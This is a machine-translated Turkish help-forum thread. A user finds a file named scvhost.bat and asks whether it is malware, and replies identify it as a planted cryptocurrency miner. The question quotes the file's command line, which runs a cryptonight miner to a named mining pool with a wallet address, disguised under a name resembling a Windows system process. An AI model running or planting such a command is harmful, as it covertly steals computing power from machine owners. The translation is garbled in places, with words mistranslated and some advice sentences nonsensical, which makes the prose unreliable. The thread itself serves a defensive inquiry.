Scvhost.bat adlı bu .bat dosyasını yeni buldum. Dosyada şu içerik vardı:
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
Bu bir virüs (bilgi çalmak vb.) Mi yoksa dikilmiş bir madenci mi? Ben de kripto para birimlerinde dabble ve stratumyukarıdaki dosyada belirtilen bir para birimi olarak endişeliyim .
1
Bu gerçekten bir madenci gibi görünüyor. Kripto para birimlerini kendiniz kullandığınız düşünüldüğünde, benim de kullanıyorsanız, bunun benim için kullandığınız her şeyin bir parçası olmadığından emin olun. Bunu, .bat uzantısını başka bir adla yeniden adlandırarak ve yeniden başlattıktan sonra normalde benimkini yapıp yapamayacağınızı görebilirsiniz. Bu dosya hakkında garip buldum bir şey, scvhost hem yürütmek ne adı ve yarasa dosyası göz önüne alındığında normalde kendisini çağıracak olmasıdır. Normalde bu bir döngüye neden olur.
—
LPChip
@VirtualAnomaly Sanırım burada belirtilen sCVhost ile sVChost yanılıyorsunuz. Evet, svchost'un barındırma hizmetleri için mekanik olduğunun çok farkındayım.
—
LPChip
@LPChip Özür dilerim, haklısın, yanılmışım.
—
Sanal Anomali
Birisi çok fazla Starcraft oynadı, sanırım.
—
CodesInChaos
@lucidbrot SCV'ler, oyunun yarışlarından birinin (terrans) “kurucu” birimidir, bu durumda "Uzay İnşaat Aracı" anlamına gelir.
—
Aaron